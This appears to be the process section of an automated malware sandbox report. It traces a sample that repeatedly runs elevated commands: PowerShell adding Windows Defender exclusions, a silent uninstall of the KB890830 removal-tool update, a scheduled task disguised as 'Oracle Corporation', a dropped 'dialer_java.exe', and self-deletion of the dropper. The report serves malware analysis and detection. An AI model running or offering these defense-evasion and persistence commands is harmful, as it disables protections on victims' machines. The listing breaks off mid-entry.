Target ID:	8
Start time:	11:49:24
Start date:	12/01/2025
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	true
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0xad0000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:49:24
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:49:24
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:49:24
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\schtasks.exe /run /tn "Oracle Corporation"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:49:24
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\sE5IdDeTp2.exe"
Imagebase:	0x7ff744460000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:49:24
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:49:24
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:49:24
Start date:	12/01/2025
Path:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Imagebase:	0x7ff695dc0000
File size:	1'245'320 bytes
MD5 hash:	DD36F6F79E68D5E54C75527DB2DA97AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 37%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:49:24
Start date:	12/01/2025
Path:	C:\Windows\System32\choice.exe
Wow64 process (32bit):	false
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0x7ff6e86d0000
File size:	35'840 bytes
MD5 hash:	1A9804F0C374283B094E9E55DC5EE128
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	11:49:24
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8080, Parent PID: 8072

General

Target ID:	18
Start time:	11:49:24
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	11:49:35
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff744460000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1704, Parent PID: 5232

General

Target ID:	23
Start time:	11:49:35
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	11:49:35
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:49:35
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:49:35
Start date:	12/01/2025
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff7a5710000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	11:49:35
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	11:49:47
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	11:49:47
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	11:49:58
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	11:49:58
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	11:49:58
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	11:49:58
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	11:49:58
Start date:	12/01/2025
Path:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Imagebase:	0x7ff79f710000
File size:	1'245'320 bytes
MD5 hash:	DD36F6F79E68D5E54C75527DB2DA97AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	11:49:58
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7824, Parent PID: 7864

General

Target ID:	36
Start time:	11:49:58
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	11:50:09
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff744460000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	11:50:09
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	11:50:09
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	11:50:09
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	11:50:09
Start date:	12/01/2025
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff7a5710000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	11:50:09
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	11:50:09
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	11:50:19
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	11:50:19
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	11:50:19
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	11:50:19
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	11:50:19
Start date:	12/01/2025
Path:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Imagebase:	0x7ff7f21d0000
File size:	1'245'320 bytes
MD5 hash:	DD36F6F79E68D5E54C75527DB2DA97AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	11:50:19
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7224, Parent PID: 7220

General

Target ID:	50
Start time:	11:50:19
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	11:50:30
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff744460000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 344, Parent PID: 4228

General

Target ID:	52
Start time:	11:50:30
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	11:50:30
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	11:50:30
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	11:50:30
Start date:	12/01/2025
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff7a5710000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	11:50:30
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1432, Parent PID: 1712

General

Target ID:	57
Start time:	11:50:30
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	11:50:41
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	11:50:41
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	11:50:41
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	11:50:41
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	11:50:41
Start date:	12/01/2025
Path:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Imagebase:	0x7ff7cfc20000
File size:	1'245'320 bytes
MD5 hash:	DD36F6F79E68D5E54C75527DB2DA97AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	11:50:41
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1420, Parent PID: 5436

General

Target ID:	65
Start time:	11:50:41
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	11:50:51
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff744460000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4476, Parent PID: 3336

General

Target ID:	67
Start time:	11:50:51
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	11:50:51
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	11:50:51
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	11:50:51
Start date:	12/01/2025
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff7a5710000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	11:50:52
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7688, Parent PID: 7836

General

Target ID:	72
Start time:	11:50:52
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	11:51:03
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	11:51:03
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
